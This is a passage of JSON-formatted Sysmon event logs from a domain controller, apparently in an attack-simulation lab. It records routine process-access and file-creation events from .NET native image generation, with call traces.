\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.106\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010EF601300}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.106","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010EF601300}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010EF601300}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010EF601300}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.153\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-001065641300}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.153","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-001065641300}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.153\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-001065641300}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.153","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-001065641300}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.169\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-001065641300}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.169","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-001065641300}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:01.481\r\nProcessGuid: {A837DB8D-051D-5F25-0000-001065641300}\r\nProcessId: 4480\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1180-0\\System.Transactions.dll\r\nCreationUtcTime: 2020-08-01 06:01:01.481","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:01.481","ProcessGuid":"{A837DB8D-051D-5F25-0000-001065641300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1180-0\\System.Transactions.dll","CreationUtcTime":"2020-08-01 06:01:01.481","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.528\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-00105D681300}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.528","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-00105D681300}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-00105D681300}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-00105D681300}","TargetProcessId":"4416","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.528\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-00105D681300}\r\nTargetProcessId: 4416\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 